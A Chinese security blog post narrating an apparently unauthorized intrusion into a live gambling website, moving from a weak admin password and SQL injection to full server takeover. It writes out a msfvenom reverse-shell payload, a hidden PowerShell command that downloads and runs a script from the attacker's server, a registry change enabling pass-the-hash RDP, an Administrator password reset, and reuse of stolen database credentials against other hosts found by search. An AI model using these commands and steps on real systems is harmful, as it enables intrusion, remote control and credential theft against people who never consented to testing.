实战!记一次对某菠菜的简单测试
2023-5-6 12:19:52 Author: 潇湘信安(查看原文) 阅读量:32 收藏

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安设为星标”,否则可能看不到了

这篇文章由群友@dddd原创投稿,虽然是些科普型常规手法,但还是感谢师傅的分享。

0x00 前言

着无聊,网上找了一个菠菜进行简单测试,并做记录,大佬们轻喷。

0x01 弱口令

访问网站就是一个登录页面,试试简单的弱口令admin/123456,直接进入后台。

0x02 SQL注入

翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。
直接选择放弃,继续寻找,在某一个url参数上加上单引号,直接报错,SQL注入这不就来了么。
http://xxxxxx/xxxxx/GroupMember.aspx?gid=150198

说干就干,直接SQLMAP。


发现为MSSQL,且DBA权限,直接--os-shell

0x03 上线MSF

msf生成powershell脚本,并放置在网站目录下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

Vps开启监听

直接powershell上线session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

如果想要通过url拼接堆叠执行powershell会存在一个问题,就是单引号闭合问题我们可以通过对powershell进行编码一下,这样就可以绕过单引号的问题。

下面推荐一个不错的网站:

  • https://r0yanx.com/tools/java_exec_encode/

0x04 提权

直接getsystem获取system权限;如果需要提权推荐土豆家族提权,实战中成功率很高,影响的服务器版本也很多。

迁移一下进程,防止进程掉线。

0x05 远程登录服务器

发现服务器开启3389端口,因为是system权限,且为2012系统,大于2008版本都是无法抓到明文密码,直接修改adminnistrator密码。
已经成功登录进服务器,但在实战中不推荐直接修改管理员密码

0x06 通过hash远程登录管理员账号

为是win2012无法获取明文密码,直接修改管理员密码稍有些不妥;我们也可以尝试通过获取管理员NTLM远程登录机器。

与测试目标并非同一台,这只是提供一个思路!


如果使用hash远程登录RDP,需要开启"Restricted Admin Mode"

//开启Restricted Admin modeREG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
//查看是否已开启0x0则表示开启REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"

成功远程管理员桌面

0x07 其他

前期发现1433端口开放着,寻找数据库配置文件,登录数据库。

通过fofa找了一下,资产还是挺多的,且很多都开放1433端口,猜测会存在同一个人部署的网站。

尝试用获取的密码对这些资产的1433端口进行爆破,成功撞到几台数据库,且都是sa权限,结束!!!


关 注 有 礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包
 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读



文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247503324&idx=1&sn=4da754eed87477c3b28377c6fc428fb3&chksm=cfa569cff8d2e0d90a25e7a4bd2da27878779749ae52d360a6a58d8626ab7b14c856c75b8674#rd
如有侵权请联系:admin#unsafe.sh